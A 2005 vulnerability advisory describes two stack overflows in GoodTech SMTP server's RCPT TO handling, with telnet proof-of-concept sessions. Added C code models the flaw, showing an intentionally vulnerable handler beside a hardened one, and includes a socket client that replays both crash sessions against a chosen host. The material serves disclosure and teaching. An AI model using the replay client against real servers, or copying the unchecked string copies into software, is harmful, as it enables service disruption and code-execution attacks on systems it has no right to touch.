GoodTech SMTP server 5.16 RCPT TO command remote buffer overflow
Arbitrary code execution in GoodTech's SMTP server
discovered by Raphaël Rigo
Product: SMTP server by GoodTech Systems
Affected Version: 5.16 Evaluation (verified); the registered version and 5.15 are probably affected too
Not affected Version: 5.17
OS affected: All Windows NT-based systems (NT/2K/XP/2K3)
Risk: Critical
Remote Exploit: yes
URL: http://www.goodtechsys.com/smtpdnt2000.asp
Overview
========
The product provides Simple Mail Transfer Protocol (SMTP) service to any email
client out of the box. It forwards email messages directly to their recipients
by looking up the MX record of the recipient's domain.
GoodTech SMTP server runs as a service on the host Windows machine.
Vulnerabilities
===============
1) Stack overflow in RCPT TO command handling
Unchecked string copies allow a classic stack overflow.
Details :
A cascade of unchecked string copies is responsible for this
vulnerability :
- The maximum length of a command is 4096 bytes.
- The requested address is copied, without any length check (but with no
  direct consequences), into a 2048-byte buffer.
- The domain part is extracted and copied, again without any length check
  (and again with no direct consequences), into a 256-byte buffer.
- The following code is then executed : sprintf(buf,"mx.%s",domain)
  buf is only 64 bytes long and can thus be overflowed, overwriting a
  string containing the DNS server to be used for the MX lookup.
- This string now being non-empty (it has been overwritten with our
  data), the following code is executed :
  sprintf(buf1024, "Using DNS Server %s", dnsserver)
  Since we control ~4000 bytes of domain, the overwritten dnsserver string
  is long enough to overflow buf1024 and overwrite the return address of
  the function, allowing arbitrary code execution.
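The cascade above, as an added example (this is not GoodTech's code): a C model using the buffer sizes from the advisory, with a handler that reproduces the unchecked copies next to a bounded version, plus a helper that reports which copy is the first to run past its buffer for a given domain length. The exact stack layout of the real binary is not known, so the vulnerable model only shows where each copy overruns, not which neighbouring variable is clobbered. Function names, the "RCPT TO: <user@domain>" parsing and the DNS server value are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define CMD_MAX     4096   /* longest command the server accepts (advisory)   */
#define ADDR_MAX    2048   /* buffer the requested address is copied into     */
#define DOMAIN_MAX   256   /* buffer the domain is extracted into             */
#define MXNAME_MAX    64   /* buf in sprintf(buf, "mx.%s", domain)            */
#define MSG_MAX     1024   /* buf1024 in "Using DNS Server %s"                */

/* Find the text between '<' and '>' in "RCPT TO: <user@domain>".
 * Returns a pointer to it and stores its length, or NULL on bad syntax. */
static const char *locate_address(const char *cmd, size_t *len)
{
    const char *lt = strchr(cmd, '<');
    const char *gt = lt ? strchr(lt, '>') : NULL;
    if (!lt || !gt) return NULL;
    *len = (size_t)(gt - lt - 1);
    return lt + 1;
}

/* VULNERABLE model of the cascade: every copy trusts the attacker-chosen
 * length. In the real server the data that step 3 runs into is the DNS
 * server string consumed by step 4; this model does not reproduce that
 * layout, so only call it with short input (it is here to read, not to run
 * with 1100 'A's). */
int handle_rcpt_vuln(const char *cmd, char *out, size_t outlen)
{
    char addr[ADDR_MAX], domain[DOMAIN_MAX], buf[MXNAME_MAX], buf1024[MSG_MAX];
    char dnsserver[64] = "192.0.2.53";          /* assumed configured DNS server */
    size_t alen;
    const char *a = locate_address(cmd, &alen);
    if (!a) return -1;
    memcpy(addr, a, alen);                      /* 1: no check against ADDR_MAX   */
    addr[alen] = '\0';
    const char *at = strchr(addr, '@');
    if (!at) return -1;
    strcpy(domain, at + 1);                     /* 2: no check against DOMAIN_MAX */
    sprintf(buf, "mx.%s", domain);              /* 3: 64 bytes, overflows from 61 */
    if (dnsserver[0] != '\0')                   /* 4: in the real binary dnsserver */
        sprintf(buf1024, "Using DNS Server %s", dnsserver); /* is now ~4000 bytes */
    snprintf(out, outlen, "%s|%s", buf, buf1024);
    return 0;
}

/* HARDENED version: reject anything over a limit before copying it, size the
 * MX buffer for the largest domain we accept, and check every snprintf
 * return value so no format can be silently truncated or overrun. */
int handle_rcpt_safe(const char *cmd, char *out, size_t outlen)
{
    char addr[ADDR_MAX], domain[DOMAIN_MAX], buf[DOMAIN_MAX + 4], buf1024[MSG_MAX];
    const char dnsserver[] = "192.0.2.53";
    size_t alen, dlen;
    if (strlen(cmd) >= CMD_MAX) return -1;      /* enforce the command limit */
    const char *a = locate_address(cmd, &alen);
    if (!a || alen == 0 || alen >= sizeof addr) return -1;
    memcpy(addr, a, alen);
    addr[alen] = '\0';
    const char *at = strchr(addr, '@');
    if (!at || at[1] == '\0') return -1;
    dlen = strlen(at + 1);
    if (dlen >= sizeof domain) return -1;       /* 255 is also the RFC 5321 limit */
    memcpy(domain, at + 1, dlen + 1);
    if ((size_t)snprintf(buf, sizeof buf, "mx.%s", domain) >= sizeof buf) return -1;
    if ((size_t)snprintf(buf1024, sizeof buf1024, "Using DNS Server %s",
                         dnsserver) >= sizeof buf1024) return -1;
    snprintf(out, outlen, "%s|%s", buf, buf1024);
    return 0;
}

/* Which unchecked copy overruns first for a PoC-style address "aa@" + domain
 * of `domain_len` bytes: 1 = addr[2048], 2 = domain[256], 3 = buf[64],
 * 0 = none. Step 4 is not modelled since it depends on what step 3 clobbers. */
int first_overflowing_step(size_t domain_len)
{
    if (domain_len + 3 + 1 > ADDR_MAX)   return 1;
    if (domain_len + 1     > DOMAIN_MAX) return 2;
    if (domain_len + 4     > MXNAME_MAX) return 3;   /* "mx." + domain + NUL */
    return 0;
}

/* Build the advisory's PoC line with `pad` bytes of 'A' after "aa@" and run
 * it through the hardened handler; returns 0 if accepted, -1 if rejected. */
int check_safe(size_t pad)
{
    static char cmd[8192], out[2048];
    if (pad > 8000) return -1;
    size_t n = (size_t)snprintf(cmd, sizeof cmd, "RCPT TO: <aa@");
    memset(cmd + n, 'A', pad);
    cmd[n + pad] = '>';
    cmd[n + pad + 1] = '\0';
    return handle_rcpt_safe(cmd, out, sizeof out);
}
```

With the original sizes, any domain of 61 bytes or more already overruns buf even though it fits comfortably in the 256-byte domain buffer; the PoC's 1100 bytes overrun domain first and buf afterwards.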
Risk : Critical
The attacker may execute arbitrary code with the privileges of the
SYSTEM user (by default).
Proof of concept :
$ telnet localhost 25
Connected to localhost.
Escape character is '^]'.
220 test Simple Mail Transfer Service Ready. Version 5.15 (Evaluation)
HELO aaa
250 OK
RCPT TO: <aa@|'A'x1100>      ('A'x1100 = 1100 bytes of 'A')
Connection closed by foreign host.
Service crashes with EIP == 0x41414141 (the function's saved return address
was overwritten with 'AAAA').
Workaround :
None known.
Solution :
Update to v5.17
-----------------------------------------------------------------------
2) Stack overflow in multiple RCPT TO commands handling
Unchecked string copy allows a classic stack overflow.
Details :
For each RCPT TO command, the server fills a 1300-byte structure
containing the command and the MX server for the requested address.
The server allows up to 99 RCPT TO commands for a single mail, but the
structure is filled via an unchecked string copy : the command, up to
4096 bytes long, is copied into it without any length check.
This allows us to overwrite the return address of the thread by issuing
a long command as the 99th RCPT TO.
We then issue a QUIT command, which makes the thread return and execute
our code.
Risk : Critical
The attacker may execute arbitrary code with the privileges of the
SYSTEM user (by default).
Proof of concept :
$ telnet localhost 25
Connected to localhost.
Escape character is '^]'.
220 test Simple Mail Transfer Service Ready. Version 5.15 (Evaluation)
HELO aaa
250 OK
-- Repeat the following two lines 98 times :
RCPT TO: <aa@aa>
250 OK
--
RCPT TO: <|'A'x2600|@localhost>      ('A'x2600 = 2600 bytes of 'A')
250 OK
QUIT
Connection closed by foreign host.
Service crashes with EIP == 0x41414141 (the thread's saved return address
was overwritten with 'AAAA' and is used when QUIT makes the thread return).
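The two proof-of-concept sessions above, replayed by a small POSIX socket client. This is an added example, not part of the advisory: the commands, the 98/99 recipient counts and the 1100/2600 'A' paddings are taken from the PoCs, everything else (function names, the 64 KiB session buffer, line-by-line reply handling) is an assumption. It sends one line at a time and waits for the reply, so a connection that drops without a reply identifies the crash; run it only against a server you own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>

static char session[1 << 16];   /* the SMTP lines to send, CRLF-terminated */

/* Append prefix + pad bytes of 'A' + suffix + CRLF; returns the new length. */
static size_t add_line(size_t pos, const char *prefix, size_t pad, const char *suffix)
{
    size_t need = strlen(prefix) + pad + strlen(suffix) + 2;
    if (pos + need >= sizeof session) return pos;     /* never overrun our own buffer */
    memcpy(session + pos, prefix, strlen(prefix)); pos += strlen(prefix);
    memset(session + pos, 'A', pad);               pos += pad;
    memcpy(session + pos, suffix, strlen(suffix)); pos += strlen(suffix);
    session[pos++] = '\r';
    session[pos++] = '\n';
    session[pos] = '\0';
    return pos;
}

/* Build PoC 1 (one RCPT TO with an 1100-byte domain) or PoC 2 (98 short
 * recipients, a 99th with a 2600-byte local part, then QUIT) into `session`.
 * Returns the number of lines built, or -1 for an unknown PoC number. */
int build_poc(int which)
{
    size_t pos = add_line(0, "HELO aaa", 0, "");
    if (which == 1) {
        add_line(pos, "RCPT TO: <aa@", 1100, ">");
        return 2;
    }
    if (which != 2) { session[0] = '\0'; return -1; }
    for (int i = 0; i < 98; i++)
        pos = add_line(pos, "RCPT TO: <aa@aa>", 0, "");
    pos = add_line(pos, "RCPT TO: <", 2600, "@localhost>");
    add_line(pos, "QUIT", 0, "");
    return 101;
}

/* Number of RCPT TO lines currently in `session` (sanity check on the build). */
int count_rcpt(void)
{
    int n = 0;
    for (const char *p = session; (p = strstr(p, "RCPT TO:")) != NULL; p += 8) n++;
    return n;
}

size_t session_bytes(void) { return strlen(session); }

/* Connect, read the banner, then send one line at a time and wait for the
 * reply. A recv() returning 0 or an error before a reply arrives means the
 * server dropped the connection, which is the crash signature in both PoCs
 * (for PoC 2 it shows up on the QUIT line, not on the long RCPT TO). */
static int send_session(const char *host, const char *port)
{
    struct addrinfo hints, *res;
    memset(&hints, 0, sizeof hints);
    hints.ai_socktype = SOCK_STREAM;
    if (getaddrinfo(host, port, &hints, &res) != 0) return -1;
    int fd = socket(res->ai_family, res->ai_socktype, res->ai_protocol);
    if (fd < 0 || connect(fd, res->ai_addr, res->ai_addrlen) < 0) {
        freeaddrinfo(res);
        return -1;
    }
    freeaddrinfo(res);
    char reply[512];
    ssize_t got = recv(fd, reply, sizeof reply - 1, 0);    /* 220 banner */
    if (got <= 0) { close(fd); return -1; }
    printf("%.*s", (int)got, reply);
    int line = 0;
    for (const char *p = session; *p; line++) {
        const char *eol = strstr(p, "\r\n");
        if (!eol) break;
        size_t n = (size_t)(eol - p) + 2;
        if (send(fd, p, n, 0) != (ssize_t)n) break;
        got = recv(fd, reply, sizeof reply - 1, 0);
        if (got <= 0) {
            printf("connection dropped after line %d with no reply: server crashed?\n",
                   line + 1);
            close(fd);
            return 1;
        }
        printf("%.*s", (int)got, reply);
        p = eol + 2;
    }
    close(fd);
    return 0;
}

int main(int argc, char **argv)
{
    if (argc != 4 || build_poc(atoi(argv[3])) < 0) {
        fprintf(stderr, "usage: %s <host> <port> <1|2>\n", argv[0]);
        return 2;
    }
    return send_session(argv[1], argv[2]) == 1 ? 0 : 1;
}
```

A healthy server answers the long RCPT TO with a 250 or 5xx reply and QUIT with 221; on an affected 5.16 the connection is closed instead, as in the transcripts above. The client only reproduces the crash, the saved return address is overwritten with 'AAAA' and nothing further is attempted.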
Workaround :
None known.
Solution :
Update to v5.17
-----------------------------------------------------------------------
Acknowledgments
===============
Thanks to the developer for quick response and fix.
Timeline
========
2005-07-19 Discovery
2005-07-21 First attempt to contact developer
2005-07-21 Developer reply
2005-07-22 Fixed version released
2005-07-23 Advisory published